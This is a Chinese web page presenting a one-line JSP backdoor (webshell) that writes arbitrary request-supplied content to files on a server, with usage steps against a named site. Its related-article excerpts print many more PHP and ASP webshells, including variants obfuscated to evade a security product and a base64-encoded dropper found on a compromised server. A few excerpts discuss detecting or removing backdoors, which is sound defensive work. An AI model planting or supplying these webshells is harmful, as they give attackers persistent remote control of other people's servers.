JSP一句话后门
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld
然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld
相关推荐
-
JSP一句话后门
<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> 使用方法: 提交url! jsp?f=1.txt" targ
-
整理的比较全的一句话后门代码(方面大家查找后门)
最近一句话后门不断升级大家注意防范,基本上多事字符替换 过护卫神PHP一句话作者:小东 复制代码 代码如下: <?php $a = str_replace(x,"","axsxxsxexrxxt"); $a($_POST["c"]); ?> 测试成功,主要对付护卫神,其他的也可以试试 dedecms5.7一句话后门 @eval(file_get_contents('php://input')); asp一句话木马 程序代码 <%
-
JSP一句话木马代码
复制代码 代码如下: <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> 这个 后门估计不用我说了吧.还是提示一下咯.保
-
用php实现批量查询清除一句话后门的代码
总是忘记一句话放到哪个文件里去了,直接全部干掉... 复制代码 代码如下: <?//xy7 if (!isset($dir) or empty($dir)) { $dir=str_replace('\\','/',dirname(__FILE__)); echo "<font color=\"#00688B\">".$dir."</font>"; } else { $dir=$_GET['dir']; e
-
慎用preg_replace危险的/e修饰符(一句话后门常用)
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后).提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误
-
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
今天一个客户的服务器频繁被写入: mm.php 内容为: 复制代码 代码如下: <?eval($_POST[c]);?> 最后查到某文件内的第一行为以下代码: 复制代码 代码如下: fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); base64_decode("bW0ucGhw") /
-
各种一句话木马大全
<%eval request("c")%> <%execute request("c")%> <%execute(request("c"))%> <%ExecuteGlobal request("sb")%> %><%Eval(Request(chr(35)))%><% <%if request ("c")<>&quo
-
几种另类的ASP后门
<% 'code by netpatch dim dbfile,sql db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog") ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile set ydb=nothing if er
-
新型ASP后门源代码分析
本是为了逃LAKER2兄 查ASP木马程序的 现在已经挑战成功,已经加为检查对象了.公布出代码给冰点的朋友使使,希望大家喜欢! 利用的是ADOX.Catalog组件 复制代码 代码如下: <% 'code by netpatch dim dbfile,sql db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog")
-
教你识别简单的免查杀PHP后门
一个最常见的一句话后门可能写作这样 <?php @eval($_POST['cmd']);?> 或这样 <?php @assert($_POST['cmd']);?> tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _
随机推荐
- codeigniter框架批量插入数据
- IE Cookie文件格式说明
- Angular中封装fancyBox(图片预览)遇到问题小结
- SpringBoot集成Spring Data JPA及读写分离
- iOS中屏幕亮度与闪光灯控制详解
- Oracle RAC环境下的阻塞(blocking blocked)介绍和实例演示
- CakePHP框架Model函数定义方法示例
- 利用JS实现简单的日期选择插件
- Jquery对象和Dom对象的区别分析
- 理解javascript中的with关键字
- 从汇编看c++中extern关键字的使用
- C++模版函数详解
- Java生成10个1000以内的随机数并用消息框显示数组内容然后求和输出
- Java开发必会的Linux命令
- ABP入门系列之Json格式化
- C++设计模式之模板方法模式(TemplateMethod)
- python中找出numpy array数组的最值及其索引方法
- Python多线程同步---文件读写控制方法
- VMware虚拟化kvm安装部署教程小结
- 关于layui flow loading占位图的实现方法